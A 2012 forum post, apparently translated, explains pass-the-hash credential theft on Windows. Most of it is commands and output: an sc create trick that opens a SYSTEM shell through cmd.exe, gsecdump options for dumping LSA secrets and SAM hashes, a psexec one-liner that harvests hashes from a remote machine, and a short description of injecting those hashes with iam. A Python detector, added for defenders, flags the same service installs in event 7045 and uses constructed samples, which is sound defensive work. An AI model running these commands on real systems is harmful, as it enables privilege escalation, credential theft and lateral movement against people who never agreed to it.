Hash injection attack
Posted on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to load the hash information just grabbed with gsecdump into the local lsass process, which is the hash injection attack. The foreigners really are good at this; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, actually do not need to be cracked at all; this is purely a matter of using the tool. As the original article puts it, whether the password is 4 characters or 127 characters long, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
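From the defender's side, the two footprints this post leaves on a host are a service whose binary is cmd.exe and the PSEXESVC service that psexec -s installs; both surface in the Windows System log as Service Control Manager event 7045 ("A service was installed in the system"). The following is an added example written for this thread (not code from the post, TrueSec or Sysinternals) that flags such records; the sample events are constructed and the dictionary keys are this example's own names, not Windows field names.

```python
"""Flag service installations matching the interactive cmd.exe and PsExec
patterns from this thread. Records are modelled on System log event 7045;
the keys below (id, name, image, account) are this example's assumptions."""
import re

# Command interpreters that have no business being a service binary.
SHELL_IMAGE = re.compile(r"(^|[\\/])(cmd|powershell|wscript|cscript)\.exe\b", re.I)

# Constructed sample events (no real host data).
SAMPLE_EVENTS = [
    {"id": 7045, "name": "shellcmdline",            # the sc create from the post
     "image": r"C:\WINDOWS\system32\cmd.exe /K start", "account": "LocalSystem"},
    {"id": 7045, "name": "Spooler",                 # an ordinary service install
     "image": r"C:\WINDOWS\system32\spoolsv.exe", "account": "LocalSystem"},
    {"id": 7045, "name": "PSEXESVC",                # what psexec -s installs
     "image": r"%SystemRoot%\PSEXESVC.exe", "account": "LocalSystem"},
    {"id": 7036, "name": "shellcmdline",            # state change, not an install
     "image": "", "account": ""},
]


def suspicious_reasons(event):
    """Return why a 7045 record is suspicious; an empty list means benign."""
    if event.get("id") != 7045:
        return []
    reasons = []
    image = event.get("image", "")
    if SHELL_IMAGE.search(image):
        # A service pointing at an interpreter is the SYSTEM-shell trick above;
        # it never connects to the SCM, so a 1053 start failure follows it.
        reasons.append("service binary is a command interpreter")
    if event.get("name", "").upper() == "PSEXESVC":
        reasons.append("PsExec remote-execution service installed")
    return reasons


def scan(events):
    """Map each suspicious service name to the reasons it was flagged."""
    return {e["name"]: r for e in events if (r := suspicious_reasons(e))}


if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_EVENTS).items():
        print(f"{name}: {'; '.join(reasons)}")
```

Feeding it real 7045 records means mapping the log's Service Name and Service File Name fields onto the name and image keys.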